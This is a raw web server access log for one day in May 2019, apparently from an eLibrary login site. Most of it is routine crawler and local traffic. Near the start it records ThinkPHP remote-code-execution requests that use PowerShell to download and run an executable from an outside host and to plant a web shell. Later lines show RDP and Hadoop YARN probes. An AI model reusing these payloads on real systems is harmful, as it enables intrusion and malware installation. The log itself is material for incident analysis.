209.17.97.114 - - [03/May/2019:00:43:55 -0400] "GET / HTTP/1.1" 302 - 14.160.64.170 - - [03/May/2019:01:07:03 -0400] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ndrcofpaaljtrco25934.exe');start%20C:/Windows/temp/ndrcofpaaljtrco25934.exe HTTP/1.1" 200 2137 14.160.64.170 - - [03/May/2019:01:07:03 -0400] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 200 2137 14.160.64.170 - - [03/May/2019:01:07:03 -0400] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ndrcofpaaljtrco25934.exe');start%20C:/Windows/temp/ndrcofpaaljtrco25934.exe HTTP/1.1" 200 2137 127.0.0.1 - - [03/May/2019:01:48:54 -0400] "GET / HTTP/1.1" 302 - 209.17.96.226 - - [03/May/2019:02:04:05 -0400] "GET / HTTP/1.1" 302 - 92.246.76.125 - - [03/May/2019:02:04:49 -0400] "/*àCookie: mstshash=Administr " 400 - 127.0.0.1 - - [03/May/2019:03:22:31 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:03:22:31 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [03/May/2019:03:22:31 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:03:22:32 -0400] "GET /login HTTP/1.1" 200 4162 209.17.96.10 - - [03/May/2019:04:02:31 -0400] "GET / HTTP/1.1" 302 - 209.17.97.82 - - [03/May/2019:04:11:53 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:04:17:18 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:04:18:40 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:04:18:40 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [03/May/2019:04:18:40 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:04:18:41 -0400] "GET /login HTTP/1.1" 200 4162 209.17.97.42 - - [03/May/2019:04:45:28 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:04:47:48 -0400] "GET /login?error=true HTTP/1.1" 200 4162 127.0.0.1 - - [03/May/2019:04:47:49 -0400] "GET /css/new-style.css HTTP/1.1" 200 5551 127.0.0.1 - - [03/May/2019:04:47:49 -0400] "GET /images/elibrary2.png HTTP/1.1" 200 137532 127.0.0.1 - - [03/May/2019:04:47:49 -0400] "GET /images/CSG%20elibrary%20Logo.png HTTP/1.1" 200 12921 127.0.0.1 - - [03/May/2019:04:47:49 -0400] "GET /images/eLibrary%20Pro%20Logo%20-%20Powered%20by%203.png HTTP/1.1" 200 213908 127.0.0.1 - - [03/May/2019:04:47:49 -0400] "GET /images/bg.png HTTP/1.1" 200 166566 127.0.0.1 - - [03/May/2019:04:47:49 -0400] "GET /fonts/opensans-regular-webfont.woff2 HTTP/1.1" 404 990 127.0.0.1 - - [03/May/2019:04:47:50 -0400] "GET /fonts/opensans-regular-webfont.woff HTTP/1.1" 404 990 127.0.0.1 - - [03/May/2019:04:47:50 -0400] "GET /fonts/opensans-regular-webfont.ttf HTTP/1.1" 404 990 127.0.0.1 - - [03/May/2019:04:48:22 -0400] "POST /login HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:04:48:23 -0400] "GET /login?error=true HTTP/1.1" 200 4204 127.0.0.1 - - [03/May/2019:04:48:23 -0400] "GET /css/new-style.css HTTP/1.1" 200 5551 127.0.0.1 - - [03/May/2019:04:48:23 -0400] "GET /images/CSG%20elibrary%20Logo.png HTTP/1.1" 200 12921 127.0.0.1 - - [03/May/2019:04:48:23 -0400] "GET /images/elibrary2.png HTTP/1.1" 200 137532 127.0.0.1 - - [03/May/2019:04:48:23 -0400] "GET /images/eLibrary%20Pro%20Logo%20-%20Powered%20by%203.png HTTP/1.1" 200 213908 127.0.0.1 - - [03/May/2019:04:48:23 -0400] "GET /images/bg.png HTTP/1.1" 200 166566 127.0.0.1 - - [03/May/2019:04:48:24 -0400] "GET /fonts/opensans-regular-webfont.woff2 HTTP/1.1" 404 990 127.0.0.1 - - [03/May/2019:04:48:24 -0400] "GET /fonts/opensans-regular-webfont.woff HTTP/1.1" 404 990 127.0.0.1 - - [03/May/2019:04:48:24 -0400] "GET /fonts/opensans-regular-webfont.ttf HTTP/1.1" 404 990 209.17.97.10 - - [03/May/2019:05:28:14 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:05:34:43 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:09:31:04 -0400] "HEAD /login HTTP/1.1" 200 - 209.17.96.210 - - [03/May/2019:09:32:36 -0400] "GET / HTTP/1.1" 302 - 165.22.70.111 - - [03/May/2019:09:38:29 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 209.17.96.202 - - [03/May/2019:09:52:24 -0400] "GET / HTTP/1.1" 302 - 60.191.52.254 - - [03/May/2019:11:23:59 -0400] "HEAD / HTTP/1.1" 302 - 60.191.52.254 - - [03/May/2019:11:23:59 -0400] "GET /login HTTP/1.1" 200 4162 209.17.97.42 - - [03/May/2019:11:51:36 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:12:44:37 -0400] "HEAD /login HTTP/1.1" 200 - 127.0.0.1 - - [03/May/2019:12:54:43 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:12:54:46 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [03/May/2019:13:21:35 -0400] "HEAD /login HTTP/1.1" 200 - 165.22.70.111 - - [03/May/2019:14:16:01 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 127.0.0.1 - - [03/May/2019:15:00:20 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:15:00:21 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [03/May/2019:15:00:59 -0400] "GET / HTTP/1.1" 302 - 209.17.96.250 - - [03/May/2019:15:09:40 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:15:09:53 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:15:09:53 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [03/May/2019:15:09:54 -0400] "GET / HTTP/1.1" 302 - 165.22.70.111 - - [03/May/2019:16:58:46 -0400] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 2137 209.17.96.58 - - [03/May/2019:17:03:10 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:17:14:01 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:18:33:14 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:18:33:14 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [03/May/2019:18:51:13 -0400] "GET /login HTTP/1.1" 200 4162 209.17.97.10 - - [03/May/2019:19:39:38 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:20:14:45 -0400] "HEAD /login HTTP/1.1" 200 - 127.0.0.1 - - [03/May/2019:20:22:54 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:20:22:55 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [03/May/2019:20:22:57 -0400] "GET /css/new-style.css HTTP/1.1" 200 5551 127.0.0.1 - - [03/May/2019:20:22:59 -0400] "GET /fonts/opensans-regular-webfont.ttf HTTP/1.1" 404 990 127.0.0.1 - - [03/May/2019:20:23:00 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:20:23:01 -0400] "GET /fonts/opensans-regular-webfont.svg HTTP/1.1" 404 990 127.0.0.1 - - [03/May/2019:20:23:01 -0400] "GET /login HTTP/1.1" 200 4162 209.17.97.2 - - [03/May/2019:22:02:13 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [03/May/2019:23:17:36 -0400] "GET /login HTTP/1.1" 200 4162 196.52.43.95 - - [03/May/2019:23:45:09 -0400] "GET / HTTP/1.0" 302 -